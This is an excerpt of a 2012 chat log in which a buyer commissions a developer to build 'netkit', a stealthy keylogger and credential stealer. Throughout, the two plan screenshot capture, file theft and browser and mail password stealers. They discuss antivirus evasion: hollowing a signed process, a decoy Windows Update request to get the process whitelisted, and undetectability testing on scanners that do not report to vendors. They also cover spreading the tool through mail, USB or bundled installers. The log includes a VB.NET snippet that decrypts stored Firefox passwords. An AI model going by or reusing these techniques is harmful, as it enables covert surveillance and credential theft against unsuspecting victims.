  1056. [12/6/2012 1:19:29 AM] Shelly Bongo: i'm just curious because you seem to know a lot about this
  1057. [12/6/2012 1:19:34 AM] Shelly Bongo: seriously?
  1058. [12/6/2012 1:19:38 AM] ' Tweety HF;: Yeah lol
  1059. [12/6/2012 1:19:43 AM] Shelly Bongo: wow
  1060. [12/6/2012 1:20:10 AM] Shelly Bongo: i know it's too early to say, but i had service providers who were 30+ who made a much worse impression
  1061. [12/6/2012 1:20:24 AM] Shelly Bongo: i do hope we continue working together after this project
  1062. [12/6/2012 1:20:29 AM] Shelly Bongo: and that you'll have time for coding :)
  1063. [12/6/2012 1:20:34 AM] ' Tweety HF;: I hope so too.
  1064. [12/6/2012 1:20:37 AM] ' Tweety HF;: I will no problem.
  1065. [12/6/2012 1:20:47 AM] Shelly Bongo: okay
  1066. [12/6/2012 1:20:55 AM] Shelly Bongo: now before i go i wanted to validate 2 things
  1067. [12/6/2012 1:20:58 AM] ' Tweety HF;: Yes
  1068. [12/6/2012 1:21:51 AM] Shelly Bongo: 1) you will also test with AVs - not just scan4you.net (non-runtime AV) but also install actual AVs and run netkit to see if it's runtime is detected (wait for the first message to get sent to see it doesn't block it when it sees outgoing communication)
  1069. [12/6/2012 1:21:55 AM] Shelly Bongo: correct?
  1070. [12/6/2012 1:22:09 AM] ' Tweety HF;: Yes, correct.
  1071. [12/6/2012 1:22:29 AM] Shelly Bongo: which AVs do you have prepared? i'll want the 'big ones' including AVG / Norton / Avira / Kaspersky
  1072. [12/6/2012 1:22:56 AM] Shelly Bongo: also please make sure it's the "Internet Security" product trial and not the AV only
  1073. [12/6/2012 1:23:09 AM] ' Tweety HF;: MBAM, Avast, AVG, Symetric and Norton
  1074. [12/6/2012 1:23:09 AM] Shelly Bongo: because internet-sec products have more security checks
  1075. [12/6/2012 1:23:22 AM] ' Tweety HF;: The only AV im really worried about is Avast
  1076. [12/6/2012 1:23:54 AM] ' Tweety HF;: Avast has an auto sandboxie
  1077. [12/6/2012 1:24:11 AM] ' Tweety HF;: I'm thinking of jacking a signature and using it in the malware
  1078. [12/6/2012 1:24:26 AM] Shelly Bongo: "jacking a signature"?
  1079. [12/6/2012 1:24:35 AM] ' Tweety HF;: Yes
  1080. [12/6/2012 1:24:49 AM] Shelly Bongo: can you make sure to test with Avira + Kaspersky too? (i see they're not currently on your list)
  1081. [12/6/2012 1:24:56 AM] ' Tweety HF;: Yes I will
  1082. [12/6/2012 1:25:02 AM] ' Tweety HF;: Avast sandboxie checks a file for a valid signature, if not it runs in a sandbox
  1083. [12/6/2012 1:25:19 AM] Shelly Bongo: you mean a digital signature?
  1084. [12/6/2012 1:25:25 AM] Shelly Bongo: for the exe?
  1085. [12/6/2012 1:25:35 AM] ' Tweety HF;: Yes.
  1086. [12/6/2012 1:25:48 AM] Shelly Bongo: doesn't MS need to sign it using their private keys?
  1087. [12/6/2012 1:25:52 AM] Shelly Bongo: (meaning you can't "jack" it)
  1088. [12/6/2012 1:26:45 AM] ' Tweety HF;: Yup, but I have a way. Not sure if its still valid though
  1089. [12/6/2012 1:27:13 AM] ' Tweety HF;: I jack the PE of a file that has a signature, run it and suspend the process, clear the bytes in the process and inject netkit bytes
  1090. [12/6/2012 1:27:20 AM] ' Tweety HF;: so its not really jacking but shelling
  1091. [12/6/2012 1:27:42 AM] ' Tweety HF;: Just need to modify the rootkit and i will test it out soon
  1092. [12/6/2012 1:27:44 AM] Shelly Bongo: but so what if it runs in a sandbox? it will block the key hooks?
  1093. [12/6/2012 1:28:03 AM] ' Tweety HF;: it wont block anything
  1094. [12/6/2012 1:28:10 AM] ' Tweety HF;: but it can exit the application
  1095. [12/6/2012 1:28:18 AM] Shelly Bongo: then why not let it run in the sandbox
  1096. [12/6/2012 1:28:20 AM] ' Tweety HF;: well, it really depends how you will SPREAD the server?
  1097. [12/6/2012 1:28:46 AM] Shelly Bongo: it will be installed
  1098. [12/6/2012 1:28:50 AM] Shelly Bongo: via mail/usb/whatever
  1099. [12/6/2012 1:29:16 AM] Shelly Bongo: some customers might want to bind it with an installer perhaps
  1100. [12/6/2012 1:29:17 AM] Shelly Bongo: etc.
  1101. [12/6/2012 1:29:22 AM] ' Tweety HF;: I see
  1102. [12/6/2012 1:29:32 AM] ' Tweety HF;: so it shouldnt be a problem
  1103. [12/6/2012 1:29:33 AM] ' Tweety HF;: :)
  1104. [12/6/2012 1:29:35 AM] Shelly Bongo: (e.g. installer of an actual application)
  1105. [12/6/2012 1:29:37 AM] Shelly Bongo: great
  1106. [12/6/2012 1:29:44 AM] Shelly Bongo: now
  1107. [12/6/2012 1:30:21 AM] Shelly Bongo: 2) we spoke of the stealers before several times, i would like to make sure we are aligned, do you have a list of the remaining stealers to be coded?
  1108. [12/6/2012 1:30:52 AM] ' Tweety HF;: I have them in our skype logs
  1109. [12/6/2012 1:31:01 AM] ' Tweety HF;: but just to be safe, can you write them on a text file and send it over?
  1110. [12/6/2012 1:31:09 AM] ' Tweety HF;: I dont want to miss anything and disapoint you
  1111. [12/6/2012 1:31:11 AM] Shelly Bongo: okay
  1112. [12/6/2012 1:38:06 AM] *** Shelly Bongo sent credstealer.txt ***
  1113. [12/6/2012 1:38:20 AM] ' Tweety HF;: thanks
  1114. [12/6/2012 1:38:22 AM] Shelly Bongo: please go over it and tell me we're in sync
  1115. [12/6/2012 1:38:37 AM] Shelly Bongo: see the note i added - about autofill recovery
  1116. [12/6/2012 1:38:54 AM] ' Tweety HF;: Yes we are in sync
  1117. [12/6/2012 1:39:04 AM] ' Tweety HF;: Never tried the autofill recovery, I will give it a shot
  1118. [12/6/2012 1:39:14 AM] Shelly Bongo: great
  1119. [12/6/2012 1:39:26 AM] Shelly Bongo: is the screenshotting in yet btw?
  1120. [12/6/2012 1:39:35 AM] ' Tweety HF;: Yes
  1121. [12/6/2012 1:39:42 AM] ' Tweety HF;: Also
  1122. [12/6/2012 1:39:52 AM] ' Tweety HF;: I will sperate the stealer + keyloggs
  1123. [12/6/2012 1:39:54 AM] ' Tweety HF;: that ok?
  1124. [12/6/2012 1:40:03 AM] Shelly Bongo: what do you mean 'separate' them?
  1125. [12/6/2012 1:40:08 AM] ' Tweety HF;: sperate files
  1126. [12/6/2012 1:40:17 AM] Shelly Bongo: no, it should be one file
  1127. [12/6/2012 1:40:24 AM] ' Tweety HF;: Ok
  1128. [12/6/2012 1:40:28 AM] Shelly Bongo: you can separate it into 2 different modules in source code
  1129. [12/6/2012 1:40:31 AM] Shelly Bongo: and the project will Init() both
  1130. [12/6/2012 1:40:46 AM] Shelly Bongo: why do you prefer to separate them into two files anyway?
  1131. [12/6/2012 1:41:03 AM] ' Tweety HF;: I thought it would be more organised for you
  1132. [12/6/2012 1:41:08 AM] ' Tweety HF;: I was planning to split them all
  1133. [12/6/2012 1:41:11 AM] ' Tweety HF;: but it's no problem :)
  1134. [12/6/2012 1:41:30 AM] ' Tweety HF;: I will make it in one log, with screenshot + zipped attachments
  1135. [12/6/2012 1:41:36 AM] Shelly Bongo: i prefer it to be organized in source code (e.g. each item is a module)
  1136. [12/6/2012 1:41:39 AM] Shelly Bongo: the exe should be one
  1137. [12/6/2012 1:41:43 AM] ' Tweety HF;: Yes no problem.
  1138. [12/6/2012 1:42:02 AM] Shelly Bongo: and the screenshots currently are taken when?
  1139. [12/6/2012 1:42:10 AM] Shelly Bongo: configurable interval, right?
  1140. [12/6/2012 1:42:23 AM] ' Tweety HF;: Yes
  1141. [12/6/2012 1:43:10 AM] Shelly Bongo: and they're also stored in memory?
  1142. [12/6/2012 1:43:17 AM] Shelly Bongo: i hope they aren't bmp files :)
  1143. [12/6/2012 1:43:48 AM] ' Tweety HF;: JPG
  1144. [12/6/2012 1:43:58 AM] Shelly Bongo: at full screen res?
  1145. [12/6/2012 1:44:04 AM] ' Tweety HF;: Yup
  1146. [12/6/2012 1:44:22 AM] Shelly Bongo: okay
  1147. [12/6/2012 1:45:06 AM] Shelly Bongo: it should have a backlog/stack of up to X (configurable at source) screenshots per submission
  1148. [12/6/2012 1:45:18 AM] Shelly Bongo: so if a computer is offline for a long time - it won't fill the RAM with screenshots
  1149. [12/6/2012 1:45:40 AM] ' Tweety HF;: No problem
  1150. [12/6/2012 1:46:45 AM] Shelly Bongo: also, before any communication with the PHP (before even the 'installation notice') - please issue 1 HTTP request to windowsupdate.microsoft.com/
  1151. [12/6/2012 1:46:55 AM] Shelly Bongo: (and ignore the response)
  1152. [12/6/2012 1:47:17 AM] Shelly Bongo: this is just in case the computer has some AV that will say "process X is trying to communicate with host Y - allow or deny?"
  1153. [12/6/2012 1:47:29 AM] Shelly Bongo: so it'll happen with a domain that the user is likely to approve
  1154. [12/6/2012 1:47:40 AM] Shelly Bongo: (and 'whitelist' the process)
  1155. [12/6/2012 1:47:40 AM] ' Tweety HF;: sure no problem
  1156. [12/6/2012 1:47:44 AM] Shelly Bongo: thanks
  1157. [12/6/2012 1:47:48 AM] Shelly Bongo: okay
  1158. [12/6/2012 1:47:57 AM] Shelly Bongo: so that's enough for now
  1159. [12/6/2012 1:48:01 AM] Shelly Bongo: i'll let you work :)
  1160. [12/6/2012 1:48:47 AM] ' Tweety HF;: Thanks :)
  1161. [12/6/2012 2:13:47 AM] Shelly Bongo: do you check which AV is installed for sysinfo by querying the Security Center service?
  1162. [12/6/2012 2:13:56 AM] ' Tweety HF;: yes
  1163. [12/6/2012 2:14:17 AM] Shelly Bongo: okay
  1164. [12/6/2012 2:15:02 AM] Shelly Bongo: unrelated to this - do you know of anything like scan4you.net - that can work locally, e.g. some pre-made pre-configured VM cluster that has a software with it to scan a file locally
  1165. [12/6/2012 2:15:13 AM] Shelly Bongo: by all VMs, without relying on scan4you but doing it all locally
  1166. [12/6/2012 2:15:45 AM] ' Tweety HF;: Yeah but its way too much work lol
  1167. [12/6/2012 2:16:48 AM] Shelly Bongo: are there any such things available for download?
  1168. [12/6/2012 2:17:02 AM] Shelly Bongo: i'm sure it's a lot of work..
  1169. [12/6/2012 2:17:13 AM] ' Tweety HF;: I don't think so
  1170. [12/6/2012 2:17:20 AM] ' Tweety HF;: If I make one it will use scan4u
  1171. [12/6/2012 2:17:32 AM] ' Tweety HF;: if you want one the other way
  1172. [12/6/2012 2:17:38 AM] ' Tweety HF;: damn thats a lot of work
  1173. [12/6/2012 2:17:41 AM] ' Tweety HF;: not worth doing it that way lol
  1174. [12/6/2012 2:18:22 AM] Shelly Bongo: ok
  1175. [12/6/2012 4:05:42 AM] ' Tweety HF;: Hi
  1176. [12/6/2012 1:24:41 PM] Shelly Bongo: hi
  1177. [12/6/2012 2:46:21 PM] ' Tweety HF;: For Thuderbird I cannot find a decryption method, its heavly protected
  1178. [12/6/2012 2:46:32 PM] ' Tweety HF;: but i have the username encrypted + passworf encrypted
  1179. [12/6/2012 3:36:23 PM] Shelly Bongo: doesn't it use the same encryption as firefox?
  1180. [12/6/2012 3:37:12 PM] ' Tweety HF;: Nope, it uses a key.db and SSL encryption
  1181. [12/6/2012 3:37:21 PM] ' Tweety HF;: No idea how to break that
  1182. [12/6/2012 3:37:34 PM] Shelly Bongo: okay, so provide the encrypted user/pass for now
  1183. [12/6/2012 3:37:58 PM] ' Tweety HF;: Ok
  1184. [12/6/2012 3:39:14 PM] Shelly Bongo: btw, perhaps it's encrypted because you used the master password?
  1185. [12/6/2012 3:39:21 PM] Shelly Bongo: is it still encrypted without a master password?
  1186. [12/6/2012 3:39:28 PM] ' Tweety HF;: I did not use a master password :/
  1187. [12/6/2012 3:39:44 PM] ' Tweety HF;: i just used my normal hotmail credentials
  1188. [12/6/2012 3:42:32 PM] Shelly Bongo: ok
  1189. [12/6/2012 3:42:55 PM] ' Tweety HF;: but
  1190. [12/6/2012 3:42:57 PM] Shelly Bongo: http://www.nirsoft.net/utils/mailpv.html
  1191. [12/6/2012 3:42:59 PM] ' Tweety HF;: some versions
  1192. [12/6/2012 3:43:00 PM] ' Tweety HF;: use plain text
  1193. [12/6/2012 3:43:01 PM] Shelly Bongo: does this show the password?
  1194. [12/6/2012 3:43:50 PM] ' Tweety HF;: yeah that works
  1195. [12/6/2012 3:45:13 PM] Shelly Bongo: http://securityxploded.com/thunderbirdpassdecryptor.php
  1196. [12/6/2012 3:45:19 PM] Shelly Bongo: this one has more tech details and should work too
  1197. [12/6/2012 3:45:28 PM] Shelly Bongo: so it is possible (so long as no master password is set)
  1198. [12/6/2012 3:47:14 PM] ' Tweety HF;: So you want me to use this application?
  1199. [12/6/2012 3:48:00 PM] Shelly Bongo: no :)
  1200. [12/6/2012 3:48:09 PM] Shelly Bongo: i want to figure out whatever it is they do to decrypt it, and do the same
  1201. [12/6/2012 3:48:30 PM] Shelly Bongo: lets do this - in the meantime you can go on to other tasks
  1202. [12/6/2012 3:48:54 PM] Shelly Bongo: and just output the mail srv url + user/pass (encrypted), and specify if it's encrypted or not
  1203. [12/6/2012 3:49:04 PM] ' Tweety HF;: Ok
  1204. [12/6/2012 3:49:11 PM] Shelly Bongo: and we'll add decryption support later, is that okay?
  1205. [12/6/2012 3:49:18 PM] ' Tweety HF;: yes
  1206. [12/6/2012 3:50:18 PM] Shelly Bongo: can you show me the example output of this?
  1207. [12/6/2012 3:50:21 PM] Shelly Bongo: of the stealer
  1208. [12/6/2012 3:50:29 PM] Shelly Bongo: (plz setup inccorrect credentials)
  1209. [12/6/2012 3:50:36 PM] Shelly Bongo: (so i don't see your real ones)
  1210. [12/6/2012 3:50:51 PM] ' Tweety HF;: http://puu.sh/1xKxE/e1c6cbb5820e78c99c4a48fea2dd8fa0
  1211. [12/6/2012 3:51:49 PM] Shelly Bongo: can you paste it here plz?
  1212. [12/6/2012 3:52:04 PM] Shelly Bongo: the text, not image
  1213. [12/6/2012 3:52:39 PM] ' Tweety HF;: sec
  1214. [12/6/2012 3:53:10 PM] Shelly Bongo: also please add a line saying "Encrypted:" (with the value of "encType")
  1215. [12/6/2012 3:54:13 PM] ' Tweety HF;: i know the encryption technique
  1216. [12/6/2012 3:54:26 PM] ' Tweety HF;: Triple DES with Base64 Encoding
  1217. [12/6/2012 3:55:09 PM] Shelly Bongo: yes, but i want the output to say if it's encrypted (1) or not (0) - because right now, you don't decrypt it
  1218. [12/6/2012 3:55:14 PM | Edited 3:56:15 PM] ' Tweety HF;: Host: mailbox://pop3.live.comHTTP Realm: mailbox://pop3.live.com
  1219.  
  1220. Username: MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECEOYId7GezaEBBiwsYvidwrpnlbQun2LGU72d5RETwkQ7oU=
  1221.  
  1222. Password: MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOsOQCqnuzD/BBDqS1EZ6Pf7bwJPWZaerKNm
  1223.  
  1224. Host: smtp://smtp.live.com
  1225.  
  1226. HTTP Realm: smtp://smtp.live.com
  1227.  
  1228. Username: MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJbRLCQtc01IBBgTTuOIloGMdlzlHOW7T99gr4i4Q70iX6I=
  1229.  
  1230. Password: MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECC0hEupUZ23ZBBDz02Mm0LnS0oUUrUzPd2tg
  1231. [12/6/2012 3:55:31 PM] Shelly Bongo: so when there's bizzare looking user/pass - i should know if it's the actual creds or it's ecnryped
  1232. [12/6/2012 3:56:24 PM] ' Tweety HF;: done
  1233. [12/6/2012 4:01:20 PM] ' Tweety HF;: theirs a password
  1234. [12/6/2012 4:01:22 PM] ' Tweety HF;: idk what it is..
  1235. [12/6/2012 4:01:57 PM] Shelly Bongo: ?
  1236. [12/6/2012 4:02:01 PM] Shelly Bongo: what do you mean?
  1237. [12/6/2012 4:02:07 PM] ' Tweety HF;: in thunderbird
  1238. [12/6/2012 4:02:10 PM] ' Tweety HF;: key3.db
  1239. [12/6/2012 4:02:11 PM] ' Tweety HF;: is their
  1240. [12/6/2012 4:02:14 PM] ' Tweety HF;: i dont know how to read it..
  1241. [12/6/2012 4:03:19 PM] Shelly Bongo: okay, we'll add it in later
  1242. [12/6/2012 4:03:29 PM] ' Tweety HF;: ok
  1243. [12/6/2012 4:03:42 PM] Shelly Bongo: so how does it look like now? with Ecntype?
  1244. [12/6/2012 4:03:52 PM] ' Tweety HF;: [Thursday, December 06, 2012 3:54 PM] ' Tweety HF;:
  1245.  
  1246. <<< MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECJbRLCQtc01IBBgTTuOIloGMdlzlHOW7T99gr4i4Q70iX6I=
  1247. [12/6/2012 4:04:18 PM] Shelly Bongo: no i mean, you added a line saying "Encryption: [encType-value]" ?
  1248. [12/6/2012 4:05:01 PM] ' Tweety HF;: Oh, yeah I added
  1249. [12/6/2012 4:05:07 PM] Shelly Bongo: ok
  1250. [12/6/2012 8:13:23 PM] Shelly Bongo:             Dim se2 As New System.Text.StringBuilder(Zeile("encryptedPassword").ToString())
  1251.             Dim hi22 As Integer = NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, se2, se2.Length)
  1252.             Dim item2 As TSECItem = DirectCast(System.Runtime.InteropServices.Marshal.PtrToStructure(New IntPtr(hi22), GetType(TSECItem)), TSECItem)
  1253.             If PK11SDR_Decrypt(item2, tSecDec2, 0) = 0 Then
  1254.                 If tSecDec2.SECItemLen <> 0 Then
  1255.                     bvRet = New Byte(tSecDec2.SECItemLen - 1) {}
  1256.                     System.Runtime.InteropServices.Marshal.Copy(New IntPtr(tSecDec2.SECItemData), bvRet, 0, tSecDec2.SECItemLen)
  1257.                     tempHold &= Environment.NewLine & "Password: " & (System.Text.Encoding.ASCII.GetString(bvRet)) & _
  1258.                     Environment.NewLine
  1259.                 End If
  1260.             End If
  1261. [12/6/2012 8:13:44 PM] Shelly Bongo: it seems like PK11SDR_Decrypt() is the way to go - after doing base64 decoding
  1262. [12/6/2012 8:14:02 PM] ' Tweety HF;: slap it on pastebin for me
  1263. [12/6/2012 8:15:15 PM] Shelly Bongo: http://pastebin.com/BBEYdy52
  1264. [12/6/2012 8:15:33 PM] Shelly Bongo: i took it from the internals of an .exe of a keylogger builder
  1265. [12/6/2012 8:15:51 PM] Shelly Bongo: it's for FF, but the method should work the same way on Thunderbird - atleast that's what online resources claim
  1266. [12/6/2012 8:16:49 PM] ' Tweety HF;: you surE?
  1267. [12/6/2012 8:17:59 PM] Shelly Bongo: no, but it seems like it from googling around
  1268. [12/6/2012 8:18:26 PM] ' Tweety HF;: il check it out
  1269. [12/6/2012 8:18:30 PM] Shelly Bongo: you're using the NSS libs right?
  1270. [12/6/2012 8:18:31 PM] Shelly Bongo: for FF
  1271. [12/6/2012 8:18:37 PM] Shelly Bongo: okay
  1272. [12/6/2012 8:20:03 PM] Shelly Bongo: https://github.com/jnbek/mozilla_password_dump/blob/master/mozilla_password_dump.c
  1273. [12/6/2012 8:20:11 PM] Shelly Bongo: this one dumps both FF and TB
  1274. [12/6/2012 8:20:13 PM] Shelly Bongo: and uses the same method..
  1275. [12/6/2012 8:20:22 PM] Shelly Bongo: check it out please
  1276. [12/6/2012 10:07:24 PM] ' Tweety HF;: Regarding all the intervals, I think they should all be done at the same time.
  1277. [12/6/2012 10:07:40 PM] ' Tweety HF;: This stops the excess resources and less memory will be consumed.
  1278. [12/6/2012 10:41:21 PM] Shelly Bongo: hi
  1279. [12/6/2012 10:42:05 PM] Shelly Bongo: you are speaking of keylogs + screenshots?
  1280. [12/6/2012 10:42:29 PM] ' Tweety HF;: + files
  1281. [12/6/2012 10:42:31 PM] ' Tweety HF;: everything
  1282. [12/6/2012 10:42:48 PM] Shelly Bongo: i think that the intervals should default to the same value (e.g. 5 minutes) - however the functionality should be there for different intervals to be supported - e.g. i may want to get keylogs every 5 minutes, but screenshots every 1 hour
  1283. [12/6/2012 10:43:52 PM] ' Tweety HF;: That will be hard to organize due the renaming the files upon upload, also if you send everything all at once in a single ZIP, it will take less disk space as well. Too much traffic and intervals will make it heft on the memory.
  1284. [12/6/2012 10:43:54 PM] Shelly Bongo: regarding files - definitely not, it's too complex of a feature to force  it at the same interval as the keylogs - for example the total size of the file transmitted may be large and take more than 5 minutes to transmit
  1285. [12/6/2012 10:44:42 PM] Shelly Bongo: what's the challenge exactly, with keeping different intervals?
  1286. [12/6/2012 10:45:02 PM] ' Tweety HF;: The challenge is that each timer/thread will need to be kept alive while it is running.
  1287. [12/6/2012 10:45:18 PM] ' Tweety HF;: So if i have 1 timer = 1 interval i can use that for everything, then sleep the thread for an hour or so
  1288. [12/6/2012 10:45:44 PM] ' Tweety HF;: if i have 5 different intervals thats 5 timers/threads that will need to all be sleeping at the same time and waking up at different times.
  1289. [12/6/2012 10:45:50 PM] ' Tweety HF;: its too much activity and can slow the computer down
  1290. [12/6/2012 10:46:51 PM] Shelly Bongo: okay, first of all - you can use 1 "sender" thread that always sleeps for 1 minute intervals, and checks whether it is time for ANY data to be sent - logs, files, screenshots
  1291. [12/6/2012 10:47:03 PM] Shelly Bongo: and still have different timers for each of them
  1292. [12/6/2012 10:47:10 PM] Shelly Bongo: but they will need to be at 1 minute increments
  1293. [12/6/2012 10:47:27 PM] Shelly Bongo: that way, you still have 1 thread and 1 timer, and each minute you know what needs to be sent if at all
  1294. [12/6/2012 10:47:41 PM] Shelly Bongo: makes sene?
  1295. [12/6/2012 10:47:44 PM] Shelly Bongo: s/sene/sense
  1296. [12/6/2012 10:47:54 PM] ' Tweety HF;: that uses too many resources, your saying to have an alpha thread as well as 4 other threads for logs
  1297. [12/6/2012 10:48:06 PM] ' Tweety HF;: if it does a check every 1 minute and keeps running it will take too many resources
  1298. [12/6/2012 10:48:25 PM] Shelly Bongo: what resources exactly will it take too many of?
  1299. [12/6/2012 10:48:31 PM] ' Tweety HF;: RAM
  1300. [12/6/2012 10:48:43 PM] Shelly Bongo: some applications open hundreds of threads, the # of threads is no issue here
  1301. [12/6/2012 10:48:54 PM] Shelly Bongo: RAM is also a non-issue
  1302. [12/6/2012 10:49:02 PM] Shelly Bongo: each thread's timer doesn't consume more RAM
  1303. [12/6/2012 10:49:09 PM] Shelly Bongo: unless you have a memory leak
  1304. [12/6/2012 10:49:13 PM] Shelly Bongo: which you'll have to remedy :)
  1305. [12/6/2012 10:49:24 PM] ' Tweety HF;: No but the threads will be running in the background system
  1306. [12/6/2012 10:49:29 PM] Shelly Bongo: so?
  1307. [12/6/2012 10:49:33 PM] ' Tweety HF;: if the slave has it running for 30+ hours
  1308. [12/6/2012 10:49:38 PM] ' Tweety HF;: it will be a problem
  1309. [12/6/2012 10:49:46 PM] Shelly Bongo: why?
  1310. [12/6/2012 10:50:05 PM] Shelly Bongo: unless you consume more memory every minute/interval, there shouldn't be a problem
  1311. [12/6/2012 10:50:07 PM] ' Tweety HF;: because it will have 4-5 threads running + 1 alpha thread.
  1312. [12/6/2012 10:50:43 PM] Shelly Bongo: look, i need it to have different intervals
  1313. [12/6/2012 10:51:24 PM] Shelly Bongo: and i am asking you to please see how that can be implemented - i'm sure it can without compromising the stealthniess/stability of netkit
  1314. [12/6/2012 10:52:09 PM] Shelly Bongo: from my experience this is definitely something that can be done, i've seen more complex software with 20+ threads and multiple sleepers that worked fine
  1315. [12/6/2012 10:52:22 PM] ' Tweety HF;: Well I can suspend each thread and use events for every tick created if you'd like, so 1 thread and for each count it will be doing something different.
  1316. [12/6/2012 10:52:53 PM] Shelly Bongo: tell me, if we ignore the whole "send data back to the PHP" process/thread issue
  1317. [12/6/2012 10:52:59 PM] Shelly Bongo: how many threads will netkit use?
  1318. [12/6/2012 10:53:10 PM] Shelly Bongo: 1 for logger, 1 for screenshots, and 1 for files?
  1319. [12/6/2012 10:54:01 PM] ' Tweety HF;: I guess so, but my ideal way would have been call it in one thread, pack it and send all at once.
  1320. [12/6/2012 10:54:36 PM] Shelly Bongo: it can't work like this, because 1 functionality must not block/affect the other
  1321. [12/6/2012 10:54:47 PM] Shelly Bongo: each component should run from its own thread
  1322. [12/6/2012 10:54:50 PM] Shelly Bongo: and use its own timers
  1323. [12/6/2012 10:55:08 PM] Shelly Bongo: if there's an issue with RAM overutilization - it's a bug, we'll notice it and have it fixed
  1324. [12/6/2012 10:55:33 PM] ' Tweety HF;: Hmm alright, but I just dont think AV's will like the many threads sending different data outbounds.
  1325. [12/6/2012 10:56:17 PM] Shelly Bongo: sorry for the basic question - but you can share memory between threads right?
  1326. [12/6/2012 10:56:42 PM] ' Tweety HF;: Yes, but the memory in question are not something that need to be shared lol.
  1327. [12/6/2012 10:56:49 PM] Shelly Bongo: :)
  1328. [12/6/2012 10:58:01 PM | Edited 10:58:41 PM] Shelly Bongo: if so, you could have the alpha/master/sender thread take the zip files - if exist, from each worker thread (worker threads: keylogger, screenshotter, file stealer) and send whatever is there, emptying the memory of sent items, and loop this every 1 min
  1329. [12/6/2012 10:58:49 PM] Shelly Bongo: that way you only have 1 thread sending out data
  1330. [12/6/2012 10:58:50 PM] ' Tweety HF;: Ok I will implement that today ^_^
  1331. [12/6/2012 10:59:07 PM] Shelly Bongo: anyway I think AVs work per process, not per thread
  1332. [12/6/2012 10:59:16 PM] Shelly Bongo: but we will find out
  1333. [12/6/2012 10:59:17 PM] Shelly Bongo: :)
  1334. [12/6/2012 10:59:23 PM] ' Tweety HF;: Yup.
  1335. [12/6/2012 10:59:36 PM] ' Tweety HF;: I need to go out for some dinner now, I will finish this off in around an hours time.
  1336. [12/6/2012 10:59:48 PM] Shelly Bongo: okay, bon apetite
  1337. [12/7/2012 1:52:28 AM] ' Tweety HF;: Hi
  1338. [12/7/2012 1:53:11 AM] ' Tweety HF;: Got soem urget things to talk about
  1339. [12/7/2012 10:45:57 AM] Shelly Bongo: hi, write them here even if i'm not answering and i'll answer as soon as possible
  1340. [12/7/2012 10:46:04 AM] Shelly Bongo: what's up?
  1341. [12/7/2012 1:44:46 PM] ' Tweety HF;: The keylogger has a major problem, it cant pass data through delegates because the GC keeps disposing of it
  1342. [12/7/2012 1:44:56 PM] ' Tweety HF;: I need to port it to C#
  1343. [12/7/2012 1:44:59 PM] ' Tweety HF;: Is that ok?
  1344. [12/7/2012 2:36:41 PM] ' Tweety HF;: Nvm I figured out the lib problems haha, guess it's staying on VB :)
  1345. [12/7/2012 2:39:39 PM] Shelly Bongo: okay
  1346. [12/7/2012 2:39:49 PM] Shelly Bongo: btw if you can port to C# it'll be better for me
  1347. [12/7/2012 2:39:56 PM] ' Tweety HF;: I'll port it once its complete
  1348. [12/7/2012 4:40:42 PM] Shelly Bongo: can it be ported back to VB if needed? for example in the future if i'll have a foloow up project asking you to improve/update something in this code
  1349. [12/7/2012 4:40:48 PM] Shelly Bongo: you mentioned you dont do c#
  1350. [12/7/2012 4:40:55 PM] ' Tweety HF;: i can code in c#
  1351. [12/7/2012 4:40:58 PM] ' Tweety HF;: but i prefer not to
  1352. [12/7/2012 4:42:23 PM] Shelly Bongo: okay
  1353. [12/7/2012 10:38:24 PM] Shelly Bongo: how're things going?
  1354. [12/7/2012 10:38:32 PM] Shelly Bongo: what's the status with the stealers?
  1355. [12/7/2012 10:39:10 PM] ' Tweety HF;: Writing them up now :)
  1356. [12/7/2012 10:39:51 PM] Shelly Bongo: and the file stealer?
  1357. [12/7/2012 10:40:00 PM] Shelly Bongo: i am loading an account now with BTC
  1358. [12/7/2012 10:41:03 PM] ' Tweety HF;: File stealer will be done after, saving the best for last haha
  1359. [12/7/2012 11:18:34 PM] Shelly Bongo: okay, i thought at least one of them would be done by now, so there'll be time for testing prior to sunday
  1360. [12/8/2012 12:38:30 AM] Shelly Bongo: FYI, BTC wallet is ready.
  1361. [12/8/2012 2:26:04 PM] Shelly Bongo: hello?
  1362. [12/8/2012 11:49:19 PM] Shelly Bongo: ???
  1363. [12/8/2012 11:54:39 PM] ' Tweety HF;: Hi
  1364. [12/8/2012 11:54:46 PM] ' Tweety HF;: im just finishing a few stealer modules
  1365. [12/8/2012 11:59:59 PM] Shelly Bongo: what do you have left?
  1366. [12/9/2012 12:00:00 AM] Shelly Bongo: what about the file stealer?
  1367. [12/9/2012 12:00:14 AM] Shelly Bongo: i want to get an understanding of when i'll get the fully working and tested product
  1368. [12/9/2012 12:00:34 AM] Shelly Bongo: if there's a 1-2 day delay on the deadline - it's okay, just let me know what's up.
  1369. [12/9/2012 12:01:00 AM] ' Tweety HF;: you sure?
  1370. [12/9/2012 12:01:13 AM] ' Tweety HF;: I had work today so i didnt do much done
  1371. [12/9/2012 12:02:15 AM] Shelly Bongo: if you can get it by the deadline we agreed on, which is tomorrow, then it'll be much better
  1372. [12/9/2012 12:02:32 AM] Shelly Bongo: but assuming you didn't code the file stealer yet, i think we both know it's not going to happen
  1373. [12/9/2012 12:02:50 AM] ' Tweety HF;: haha, dont underestimate me
  1374. [12/9/2012 12:03:03 AM] ' Tweety HF;: ill get it done in an hour :P
  1375. [12/9/2012 12:06:32 AM] Shelly Bongo: there's writing the code, and there's testing it... i think properly testing the functionality takes time, that skills cannot compensate for :)
  1376. [12/9/2012 12:06:56 AM] Shelly Bongo: btw, when fud-testing please don't use sites that submit to AV vendors
  1377. [12/9/2012 12:07:12 AM] Shelly Bongo: chk4me should be the best free choice
  1378. [12/9/2012 12:07:15 AM] Shelly Bongo: i think
  1379. [12/9/2012 12:07:21 AM] ' Tweety HF;: I use elementscanner
  1380. [12/9/2012 12:07:25 AM] Shelly Bongo: (several tool authors from whom i bought told me that)
  1381. [12/9/2012 12:07:29 AM] Shelly Bongo: okay
  1382. [12/9/2012 12:30:01 AM] Shelly Bongo: i never asked, but are you working alone on this? can i trust that once we are over, the source will be only with me?
  1383. [12/9/2012 12:42:00 AM] ' Tweety HF;: Yes.
